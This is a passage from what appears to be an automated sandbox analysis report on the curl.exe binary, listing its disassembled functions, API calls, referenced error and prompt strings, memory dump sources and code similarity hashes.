                                • strspn.API-MS-WIN-CRT-STRING-L1-1-0(00000005,0123456789abcdefABCDEF:.,00000000,00000000,?), ref: 00875295
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,008C28BC,00000002), ref: 008752C7
                                • inet_pton.WS2_32(00000017,00000005,?), ref: 0087535F
                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000004, /:#?!@,00000000,00000000,?), ref: 008753D3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: inet_ptonstrcspnstrncmpstrspn
                                • String ID: /:#?!@$0123456789abcdefABCDEF:.
                                • API String ID: 3548342379-4134865206
                                • Opcode ID: 1a768db47c5ad648f9249eecae3806626bcc866ee6e22f3933a2b3e324e4e956
                                • Instruction ID: 0075d1d8da0e2253b391e2033229691f43b873b57ca300c9f078cdc9aae71e53
                                • Opcode Fuzzy Hash: 1a768db47c5ad648f9249eecae3806626bcc866ee6e22f3933a2b3e324e4e956
                                • Instruction Fuzzy Hash: 27510431904B498EEB20CB68CC507AA7BE5FF07380F248469D489D73DAEBE0E9458761
                                APIs
                                • _strrchr.LIBCMT ref: 0089DB47
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089DBC4
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089DBE8
                                  • Part of subcall function 008AC864: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0089DB17), ref: 008AC885
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089DC0E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089DC25
                                Strings
                                • Wildcard - Parsing started, xrefs: 0089DCA0
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$calloc$_strrchr
                                • String ID: Wildcard - Parsing started
                                • API String ID: 3895608051-2475583933
                                • Opcode ID: efe82dbbecbc05a1f9b40317870d4b297e76abbdd0e3142d5352eb02e4f96fb2
                                • Instruction ID: 77e1719fdf7b7ac8e32d3c1af66c4895463bb7d48650d58a9682a7f10d4cf5db
                                • Opcode Fuzzy Hash: efe82dbbecbc05a1f9b40317870d4b297e76abbdd0e3142d5352eb02e4f96fb2
                                • Instruction Fuzzy Hash: FF41CD31704B16AFEB18AF68EC44799BBE4FF09764F28012AE509D7391DBB06C40CB94
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 0086347F
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B6C58), ref: 0086348D
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008635C2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfclosefopen
                                • String ID: %s$%s$Failed to open %s to write libcurl code!
                                • API String ID: 4110152555-3591596397
                                • Opcode ID: 2a7a3647588cbbb9ca940156623bdd6147c9eb9b3fb35b92e07b29ed095ccfb4
                                • Instruction ID: 67e799960762f1bb5f46139203c7625889c9dffd2dc427beb5a521196ceec53d
                                • Opcode Fuzzy Hash: 2a7a3647588cbbb9ca940156623bdd6147c9eb9b3fb35b92e07b29ed095ccfb4
                                • Instruction Fuzzy Hash: 95413B71508701ABD7129B1CAC06F56B76AFFA2324F260015F919E7341EB31FF11C6A9
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867A80
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00867A9C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: o$output file name has no length
                                • API String ID: 1865132094-237255669
                                • Opcode ID: fa8d5b48a82b521302c7ef524f87d363db3e6459c039cdbb01d1a9550d50c66b
                                • Instruction ID: cbe8a91d04f2f58f706351de99b9d354c8eec15d66ec25787276c211ab235273
                                • Opcode Fuzzy Hash: fa8d5b48a82b521302c7ef524f87d363db3e6459c039cdbb01d1a9550d50c66b
                                • Instruction Fuzzy Hash: D3418171608B42DFD325CF3898547A6B7E1FF45369F2A4A1EE5AAC7280DB30DC429781
                                APIs
                                  • Part of subcall function 00863857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00863872
                                • ___from_strstr_to_strchr.LIBCMT ref: 00875198
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A,?,00000000,00000000,?,?,?,?,?,?,00875B5D,00000000), ref: 008751D4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr__stdio_common_vsscanfstrtol
                                • String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n$]
                                • API String ID: 1045171823-394001614
                                • Opcode ID: 45ae63b9d1175e7335f6a7c6e6c024a6889daebcf097062ac03f3dba6bd49fce
                                • Instruction ID: 01ae19742dcde851b00de0580fedfbd5fd86364f95e935d3c8850f33bf899c25
                                • Opcode Fuzzy Hash: 45ae63b9d1175e7335f6a7c6e6c024a6889daebcf097062ac03f3dba6bd49fce
                                • Instruction Fuzzy Hash: 48316C31E046496FEB309B689C41BFE77ACFF01710F54816AE84DE7286D6B0ED4183A1
                                APIs
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 0088B02A
                                Strings
                                • seek callback returned error %d, xrefs: 0088AFAE
                                • Cannot rewind mime/post data, xrefs: 0088B048
                                • necessary data rewind wasn't possible, xrefs: 0088B038
                                • the ioctl callback returned %d, xrefs: 0088AFFA
                                • ioctl callback returned error %d, xrefs: 0088B00D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fseek
                                • String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                • API String ID: 623662203-539828175
                                • Opcode ID: 74cf8a52100fec29ccaf6723d3e5bba7c6c45b7ef529d0fcd8a73ec430ae2a86
                                • Instruction ID: fd2fc2e368008b4f9f3b1abf169a0e7c888fa79f757ed72b856316013a1bd405
                                • Opcode Fuzzy Hash: 74cf8a52100fec29ccaf6723d3e5bba7c6c45b7ef529d0fcd8a73ec430ae2a86
                                • Instruction Fuzzy Hash: EE310631700A02ABCA286B348CD5EBBBB65FF91368F084225F52DD7390CB61AC50D792
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086D7AC
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086D7B7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0086D8B0
                                Strings
                                • Enter %s password for user '%s' on URL #%zu:, xrefs: 0086D85B
                                • %s:%s, xrefs: 0086D897
                                • Enter %s password for user '%s':, xrefs: 0086D836
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$free
                                • String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
                                • API String ID: 3654317688-2337704101
                                • Opcode ID: 7d13bd79fca58ba7ab12cf5ab7d3610e7a7959feb94a14aaf86c4b5712281bba
                                • Instruction ID: 85e818535c4399005f1206b5fa6344d2520ece65507327cb089f46be68619aca
                                • Opcode Fuzzy Hash: 7d13bd79fca58ba7ab12cf5ab7d3610e7a7959feb94a14aaf86c4b5712281bba
                                • Instruction Fuzzy Hash: 5C31B171E0121AAEEB21DB64CC41BDABBB5FF18300F1044F5A448E7242DB71AA84CF51
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00869CB9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00869CCD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869D63
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869D74
                                Strings
                                • out of memory, xrefs: 00869CDC
                                • Got more output options than URLs, xrefs: 00869D9F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup
                                • String ID: Got more output options than URLs$out of memory
                                • API String ID: 2653869212-1666425204
                                • Opcode ID: ff3c95167438439420e09fd1351cfeff6237fd42dd346bbc35dc49c5677b12be
                                • Instruction ID: 7478c7b14f515144cd0a73d0d872cb469858bc64a85dd649aee533234882263d
                                • Opcode Fuzzy Hash: ff3c95167438439420e09fd1351cfeff6237fd42dd346bbc35dc49c5677b12be
                                • Instruction Fuzzy Hash: EC318B316042468FDF059F28D889BA87BB5FF40325F2940BAE845DF2D2DB74D884CB51
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,754C1980,?,00881D52,?,?,?,?,00868B8E), ref: 00881AF5
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00881D52,?,?,?,?,00868B8E), ref: 00881B03
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00881D52,?,?,?,?,00868B8E), ref: 00881B11
                                  • Part of subcall function 00887EC3: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00888849,00000000,?,?,?,00872373,?,?,?,?,008616C6,?,00200030), ref: 00887F33
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func$free
                                • String ID: <$`$v
                                • API String ID: 1664282339-4007386528
                                • Opcode ID: 5a3a7cd371e17ca8731b5e8f5b28bd7462cf830c8be07210207c54bfda1c4ef9
                                • Instruction ID: 7751b26a8726ac6ed371d5062e36b871c22d14ee6f705d56f9565582cae7aaa7
                                • Opcode Fuzzy Hash: 5a3a7cd371e17ca8731b5e8f5b28bd7462cf830c8be07210207c54bfda1c4ef9
                                • Instruction Fuzzy Hash: 8451BEB09097808AEB55CF29D8C87C53BA0AF99704F1841BAED4C8F39BD7BA1144CF65
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 0088681E
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20,?,?,00000000), ref: 00886848
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088686D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886887
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0088688F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008868E3
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008868E7
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$fclose$fopenmalloc
                                • String ID:
                                • API String ID: 2597608617-0
                                • Opcode ID: 622f577c381882570566488aa679b3e3f7ec26c62fd16e93bb065736267d5c02
                                • Instruction ID: bc2c6fa4e7ce8f3bc671a4811c7411e6e49ac586ed8d55baeac15a789bdbcbe4
                                • Opcode Fuzzy Hash: 622f577c381882570566488aa679b3e3f7ec26c62fd16e93bb065736267d5c02
                                • Instruction Fuzzy Hash: 79212B32604A168FEB152F24EC1477E3BE5FF4AB61B28403AE801D73A2EFB45C114790
                                APIs
                                • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00869282
                                  • Part of subcall function 0086F352: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 0086F58A
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(000000FF), ref: 0086930A
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00869311
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00869319
                                  • Part of subcall function 00870B16: _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00862077,?,00008501,00000180), ref: 00870B2D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_close_fileno_fstat64_openfree
                                • String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
                                • API String ID: 440421868-219864042
                                • Opcode ID: ea5f797bb5236a940dff2ba14ac607d1bf651e19daea989ece1038c0f7cb2e63
                                • Instruction ID: da17638e1a60811b5f3bdbc127850acd14871642283aa899d1c068740d9d591e
                                • Opcode Fuzzy Hash: ea5f797bb5236a940dff2ba14ac607d1bf651e19daea989ece1038c0f7cb2e63
                                • Instruction Fuzzy Hash: D3210472600704AFDB249B68ED41AAAB7A8FF08320F10052DF4A6D27D1DB70EC018B11
                                APIs
                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,?,008B25F8,?,?,008CF464,00000000,?,008B2723,00000004,InitializeCriticalSectionEx,008B627C,InitializeCriticalSectionEx,00000000), ref: 008B25C7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: api-ms-
                                • API String ID: 3664257935-2084034818
                                • Opcode ID: 4f2aa4a51d61f96732983d27519e232f3f6a0323335061b8a81b097539c37f42
                                • Instruction ID: 2312a4f4686f2caffa904bf8ccd2aa22d13e33760e629eaa70976dc804f924b3
                                • Opcode Fuzzy Hash: 4f2aa4a51d61f96732983d27519e232f3f6a0323335061b8a81b097539c37f42
                                • Instruction Fuzzy Hash: 9C11A032A01A25ABDB725F6C9C55BD933A8FF017A0F640260F911EB380D770ED018AD1
                                APIs
                                • SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0(00000000,curl-ca-bundle.crt,00000000,00000104,?,?), ref: 008630AB
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008630BD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 008630CA
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008630DD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 008630E9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree$PathSearch
                                • String ID: curl-ca-bundle.crt
                                • API String ID: 4109318298-694051528
                                • Opcode ID: 8c93c652c524f02ca85b61deb74f56284874470c4dbe7bb219ba73940325c9a3
                                • Instruction ID: 098fbee34e04c7e7ba7b26ad88ea06ae7f0d6829fb95ee564f3cbc13c734e1f1
                                • Opcode Fuzzy Hash: 8c93c652c524f02ca85b61deb74f56284874470c4dbe7bb219ba73940325c9a3
                                • Instruction Fuzzy Hash: 3D119171505B089FDB209F649C85BDAB7B8FF45715F00066EE981D7241DB7099488A11
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,0086900B), ref: 00868E64
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0086900B), ref: 00868E7F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,error initializing curl library,?,0086900B), ref: 00868ECE
                                Strings
                                • error retrieving curl library information, xrefs: 00868EB9
                                • error initializing curl, xrefs: 00868ED9
                                • error initializing curl library, xrefs: 00868EC0
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfreemalloc
                                • String ID: error initializing curl$error initializing curl library$error retrieving curl library information
                                • API String ID: 2771806388-2118345949
                                • Opcode ID: 0657b20637c7eb5f8114d4769ca8de18be76b70f6d06acd61c4f58c0fe56e907
                                • Instruction ID: 6674aefabbe59f770f754728792933a97b121f9cb11245f08d336b0279eaadcc
                                • Opcode Fuzzy Hash: 0657b20637c7eb5f8114d4769ca8de18be76b70f6d06acd61c4f58c0fe56e907
                                • Instruction Fuzzy Hash: C001D671104B01DFD361AB18E80965B77F4FF45324B25462EE49AD6791DFB5E4008B22
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,754C3C50,00000000,008817E1,00868BF9), ref: 008815DF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008815FE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088161B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881638
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881655
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881672
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088168F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008816AC
                                  • Part of subcall function 00875D80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00875D9B
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6a9d3de8e7fbc82ce538819bb21eb2aa2c72b7f507820f1c9047729013bfe0e4
                                • Instruction ID: a7da1084d9b040c706b447cee546f723b09c985b12f0c214defd935e2028ff8e
                                • Opcode Fuzzy Hash: 6a9d3de8e7fbc82ce538819bb21eb2aa2c72b7f507820f1c9047729013bfe0e4
                                • Instruction Fuzzy Hash: 8C217832614A16EFE7085F34EC4999CFBA5FB49651F14832BD51993362CFB528209F90
                                APIs
                                  • Part of subcall function 008AADF2: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 008AAE0A
                                  • Part of subcall function 008AADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAE21
                                  • Part of subcall function 008AADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008AAE3D
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,008AB2F1,?), ref: 008AFBFD
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,008AB2F1,?), ref: 008AFC53
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,008AB2F1,?,?,?,00000000), ref: 008AFCA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callocfree$_strdupmalloc
                                • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                                • API String ID: 3060414022-4232989830
                                • Opcode ID: 63937e46310c4379249c83a1aee5cc1be0e11ff26c7317b2116edf50a50003e8
                                • Instruction ID: 0d248ea3217501f5aaef096b44d521a845bdb41642e6e9ab8d9c0189dda82baa
                                • Opcode Fuzzy Hash: 63937e46310c4379249c83a1aee5cc1be0e11ff26c7317b2116edf50a50003e8
                                • Instruction Fuzzy Hash: 7F917271A00619AFEB14CF94D854BAEBBF5FF09320F14812AEA05D7691D774ED41CB90
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884EE0
                                Strings
                                • Could not resolve host: %s, xrefs: 0088504D
                                • Failed to resolve host '%s' with timeout after %ld ms, xrefs: 00885016
                                • Unix socket path too long: '%s', xrefs: 00884F20
                                • Couldn't resolve proxy '%s', xrefs: 008850E9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
